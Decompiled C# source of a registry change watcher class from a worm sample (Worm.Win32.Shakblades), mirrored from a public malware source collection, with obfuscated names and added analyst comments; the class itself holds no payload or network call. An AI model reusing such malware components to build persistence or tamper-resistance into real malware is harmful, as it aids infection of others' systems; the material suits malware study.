mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-04 09:25:27 +00:00
// Decompiled with JetBrains decompiler
// Type: Ҧ߲๒ʽ໙ୄᴘ.ᘽƭ
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.IO;
using System.Runtime.InteropServices;
using System.Threading;
namespace Ҧ߲๒ʽ໙ୄᴘ
{
    /// <summary>
    /// Registry change watcher recovered from an obfuscated assembly. It opens one
    /// registry key through advapi32 and blocks a background thread on
    /// RegNotifyChangeKeyValue, raising an event each time the key (or its subtree)
    /// changes.
    /// </summary>
    /// <remarks>
    /// All identifiers are the obfuscator's; the comments below name each member's role
    /// as established by the Win32 entry points and constant values used in this file.
    /// Which key is watched, and what the subscriber does on a change, is decided by
    /// callers that are not part of this listing.
    /// </remarks>
    public class ᘽƭ : IDisposable
    {
        // Access-right bits; the values equal Win32 KEY_QUERY_VALUE (0x0001),
        // KEY_NOTIFY (0x0010) and STANDARD_RIGHTS_READ (0x00020000).
        private const int ሜኯᴭၚ໓ম\u1B7Eıᗝ = 1;
        private const int \u0D58Ꮈೇ\u00AEႍ = 16;
        private const int \u08D2ᰆ = 131072;

        // Predefined root-key handles 0x80000000 .. 0x80000006. The hive switch further
        // down maps them, in order, to ClassesRoot, CurrentUser, LocalMachine, Users,
        // PerformanceData, CurrentConfig and DynData.
        private static readonly IntPtr ốኯՕằቜ\u0FC9ˡ = new IntPtr(int.MinValue);
        private static readonly IntPtr ᄉǹ\u05FFఔ = new IntPtr(-2147483647);
        private static readonly IntPtr \u1C31᪱ࢢ = new IntPtr(-2147483646);
        private static readonly IntPtr ምࢨញഥ = new IntPtr(-2147483645);
        private static readonly IntPtr ৰ\u139Fᙇ = new IntPtr(-2147483644);
        private static readonly IntPtr yଳጻഷቝ = new IntPtr(-2147483643);
        private static readonly IntPtr \u176D᧒ޢਕೆጾૐ = new IntPtr(-2147483642);

        // Root-key handle selected by the constructor.
        private IntPtr \u0029Ѽ\u09D1ᚻ\u08BFჶ;

        // Sub-key path below the root, passed to RegOpenKeyEx.
        private string ˣཐᛮ;

        // Lock object guarding start/stop and the filter setter.
        private object ϒ\u0EDBไᏧ\u0CC5ᒎႛᬛ = new object();

        // Background monitor thread; null while the watcher is not running.
        private Thread ݍࠗ\u0B98\u0FF8᳡ષρᎻ;

        // Signalled to ask the monitor thread to leave its loop.
        private ManualResetEvent \u08F1ᤜᬯ = new ManualResetEvent(false);

        // Notify filter handed to RegNotifyChangeKeyValue. The enum type is declared
        // outside this file. NOTE(review): the four OR-ed members are presumably the
        // REG_NOTIFY_CHANGE_* flags (name, attributes, last set, security); confirm
        // against the enum definition.
        private \u187Bȸº᭰\u09FC Ẏᛑደ =
            \u187Bȸº᭰\u09FC.ഴᏮ\u18ABٞᴑ\u1C96ᦁྌᚳ
            | \u187Bȸº᭰\u09FC.ᰃ
            | \u187Bȸº᭰\u09FC.ཅ\u000A
            | \u187Bȸº᭰\u09FC.ẟᛗᚕ\u0C11ᘾ;

        /// <summary>Watches the key identified by <paramref name="registryKey"/>'s full name.</summary>
        public ᘽƭ(RegistryKey registryKey)
        {
            this.\u05F8ᨅ᩵۷ኝ᭯(registryKey.Name);
        }

        /// <summary>Watches the key given as a full path such as <c>ROOT\sub\key</c>.</summary>
        public ᘽƭ(string name)
        {
            this.\u05F8ᨅ᩵۷ኝ᭯(name);
        }

        /// <summary>Watches <paramref name="subKey"/> below the given hive.</summary>
        public ᘽƭ(RegistryHive registryHive, string subKey)
        {
            this.ᳶ\u1A8Cˉၕᖁ\u001Eඹᶋ(registryHive, subKey);
        }

        // advapi32!RegOpenKeyEx: opens subKey under hKey with the requested access mask.
        [DllImport("advapi32.dll", EntryPoint = "RegOpenKeyEx", SetLastError = true)]
        private static extern int ᴊזى\u0C70\u0DCE\u0DF4(
            IntPtr hKey,
            string subKey,
            uint options,
            int samDesired,
            out IntPtr phkResult);

        // advapi32!RegNotifyChangeKeyValue: arms a change notification on an open key.
        [DllImport("advapi32.dll", EntryPoint = "RegNotifyChangeKeyValue", SetLastError = true)]
        private static extern int \u0731ᄦѧ\u08D2װ\u002Fᇣ(
            IntPtr hKey,
            bool watchSubtree,
            \u187Bȸº᭰\u09FC notifyFilter,
            IntPtr hEvent,
            bool asynchronous);

        // advapi32!RegCloseKey: releases a handle obtained from RegOpenKeyEx.
        [DllImport("advapi32.dll", EntryPoint = "RegCloseKey", SetLastError = true)]
        private static extern int ᦍ\u0008Տ\u0DF9ទƕ\u02FD(IntPtr hKey);

        /// <summary>Event associated with <see cref="OnRegChanged"/>.</summary>
        public event EventHandler ဧŕᬐ\u0AD4߭;

        /// <summary>
        /// Invokes the change handler, if one is attached, with this instance as sender
        /// and null event arguments.
        /// </summary>
        protected virtual void OnRegChanged()
        {
            // NOTE(review): \u0BF1 is not declared in this listing; presumably it is the
            // compiler-generated backing field of the event above, renamed by the
            // obfuscator. Confirm against the IL.
            EventHandler handler = this.\u0BF1;
            if (handler != null)
            {
                handler(this, null);
            }
        }

        /// <summary>Error event; nothing in this listing raises it.</summary>
        public event ErrorEventHandler ᑂϦڢྜƘ;

        /// <summary>
        /// Called with any exception that escapes the monitor loop. The body is empty
        /// in this decompiled listing, so such exceptions are dropped silently.
        /// </summary>
        protected virtual void OnError(Exception e)
        {
        }

        /// <summary>Stops the monitor thread and suppresses finalization.</summary>
        public void Dispose()
        {
            this.ᑺᆊᥖᅁỸਇয\u191F();
            GC.SuppressFinalize(this);
        }

        /// <summary>
        /// Notify filter used the next time the notification is armed. The setter takes
        /// the instance lock; the getter and the monitor loop read the field without it.
        /// </summary>
        public \u187Bȸº᭰\u09FC ܜᛓѕଢ਼֨᳑ᐱ
        {
            get
            {
                return this.Ẏᛑደ;
            }

            set
            {
                lock (this.ϒ\u0EDBไᏧ\u0CC5ᒎႛᬛ)
                {
                    this.Ẏᛑደ = value;
                }
            }
        }

        /// <summary>
        /// Stores the root handle for <paramref name="hive"/> and the sub-key path.
        /// There is no default case: a hive value not listed here leaves the root
        /// handle at whatever it already held.
        /// </summary>
        private void ᳶ\u1A8Cˉၕᖁ\u001Eඹᶋ(RegistryHive hive, string subKeyPath)
        {
            switch (hive)
            {
                case RegistryHive.ClassesRoot:
                    this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.ốኯՕằቜ\u0FC9ˡ;
                    break;

                case RegistryHive.CurrentUser:
                    this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.ᄉǹ\u05FFఔ;
                    break;

                case RegistryHive.LocalMachine:
                    this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.\u1C31᪱ࢢ;
                    break;

                case RegistryHive.Users:
                    this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.ምࢨញഥ;
                    break;

                case RegistryHive.PerformanceData:
                    this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.ৰ\u139Fᙇ;
                    break;

                case RegistryHive.CurrentConfig:
                    this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.yଳጻഷቝ;
                    break;

                case RegistryHive.DynData:
                    this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.\u176D᧒ޢਕೆጾૐ;
                    break;
            }

            this.ˣཐᛮ = subKeyPath;
        }

        /// <summary>
        /// Splits a full key name on backslashes, maps the first segment to a root
        /// handle and keeps the remaining segments as the sub-key path.
        /// </summary>
        /// <remarks>
        /// Short forms are accepted only for HKCR, HKCU and HKLM. An unrecognised root
        /// stores <see cref="IntPtr.Zero"/>, which is later passed to RegOpenKeyEx as-is.
        /// </remarks>
        private void \u05F8ᨅ᩵۷ኝ᭯(string fullKeyName)
        {
            string[] segments = fullKeyName.Split('\\');
            string rootName = segments[0];

            switch (rootName)
            {
                case "HKEY_CLASSES_ROOT":
                case "HKCR":
                    this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.ốኯՕằቜ\u0FC9ˡ;
                    break;

                case "HKEY_CURRENT_USER":
                case "HKCU":
                    this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.ᄉǹ\u05FFఔ;
                    break;

                case "HKEY_LOCAL_MACHINE":
                case "HKLM":
                    this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.\u1C31᪱ࢢ;
                    break;

                case "HKEY_USERS":
                    this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.ምࢨញഥ;
                    break;

                case "HKEY_CURRENT_CONFIG":
                    this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ᘽƭ.yଳጻഷቝ;
                    break;

                default:
                    this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = IntPtr.Zero;
                    break;
            }

            // Everything after the root segment, re-joined with backslashes.
            this.ˣཐᛮ = string.Join("\\", segments, 1, segments.Length - 1);
        }

        /// <summary>True while a monitor thread is recorded for this instance.</summary>
        public bool Ꮹ᷄ᡊ\u008Dᐳᆉܳ
        {
            get { return this.ݍࠗ\u0B98\u0FF8᳡ષρᎻ != null; }
        }

        /// <summary>
        /// Starts the background monitor thread unless one is already recorded.
        /// </summary>
        public void ůߝᨍ()
        {
            lock (this.ϒ\u0EDBไᏧ\u0CC5ᒎႛᬛ)
            {
                if (!this.Ꮹ᷄ᡊ\u008Dᐳᆉܳ)
                {
                    // Clear a stop request left over from a previous run.
                    this.\u08F1ᤜᬯ.Reset();

                    Thread worker = new Thread(this.ဖཀྵ\u0F02̢᠗Ôଚ᭗ɭ);
                    this.ݍࠗ\u0B98\u0FF8᳡ષρᎻ = worker;

                    // Background thread: it does not keep the process alive.
                    worker.IsBackground = true;
                    worker.Start();
                }
            }
        }

        /// <summary>
        /// Signals the monitor thread to stop and waits for it to finish. The lock is
        /// held for the whole wait.
        /// </summary>
        public void ᑺᆊᥖᅁỸਇয\u191F()
        {
            lock (this.ϒ\u0EDBไᏧ\u0CC5ᒎႛᬛ)
            {
                Thread worker = this.ݍࠗ\u0B98\u0FF8᳡ષρᎻ;
                if (worker != null)
                {
                    this.\u08F1ᤜᬯ.Set();
                    worker.Join();
                }
            }
        }

        /// <summary>
        /// Thread entry point: runs the monitor loop, forwards any exception to
        /// <see cref="OnError"/>, then clears the thread field (without taking the lock).
        /// </summary>
        private void ဖཀྵ\u0F02̢᠗Ôଚ᭗ɭ()
        {
            try
            {
                this.ۺ៝\u05BE᭬ქ();
            }
            catch (Exception ex)
            {
                this.OnError(ex);
            }

            this.ݍࠗ\u0B98\u0FF8᳡ષρᎻ = null;
        }

        /// <summary>
        /// Opens the configured key, then repeatedly arms a change notification on it
        /// (subtree included, asynchronous) and waits for either a change or the stop
        /// signal. The key handle is closed when the loop ends or throws.
        /// </summary>
        /// <exception cref="Win32Exception">
        /// RegOpenKeyEx or RegNotifyChangeKeyValue returned a non-zero status.
        /// </exception>
        private void ۺ៝\u05BE᭬ქ()
        {
            // 131072 | 16 | 1 == 131089 (0x20011), the literal the decompiler emitted.
            const int desiredAccess = ᘽƭ.\u08D2ᰆ | ᘽƭ.\u0D58Ꮈೇ\u00AEႍ | ᘽƭ.ሜኯᴭၚ໓ম\u1B7Eıᗝ;

            IntPtr keyHandle;
            int openStatus = ᘽƭ.ᴊזى\u0C70\u0DCE\u0DF4(
                this.\u0029Ѽ\u09D1ᚻ\u08BFჶ,
                this.ˣཐᛮ,
                0U,
                desiredAccess,
                out keyHandle);
            if (openStatus != 0)
            {
                throw new Win32Exception(openStatus);
            }

            try
            {
                // NOTE(review): this event is never disposed in the listing.
                AutoResetEvent changeSignal = new AutoResetEvent(false);

                // Index 0 = change notification, index 1 = stop request.
                WaitHandle[] signals = new WaitHandle[] { changeSignal, this.\u08F1ᤜᬯ };

                while (!this.\u08F1ᤜᬯ.WaitOne(0, true))
                {
                    // The notification has to be armed again on every pass.
                    int notifyStatus = ᘽƭ.\u0731ᄦѧ\u08D2װ\u002Fᇣ(
                        keyHandle,
                        true,
                        this.Ẏᛑደ,
                        changeSignal.SafeWaitHandle.DangerousGetHandle(),
                        true);
                    if (notifyStatus != 0)
                    {
                        throw new Win32Exception(notifyStatus);
                    }

                    // Only a wake-up from the change event raises the callback; a
                    // wake-up from the stop event falls through to the loop test.
                    if (WaitHandle.WaitAny(signals) == 0)
                    {
                        this.OnRegChanged();
                    }
                }
            }
            finally
            {
                if (keyHandle != IntPtr.Zero)
                {
                    ᘽƭ.ᦍ\u0008Տ\u0DF9ទƕ\u02FD(keyHandle);
                }
            }
        }
    }
}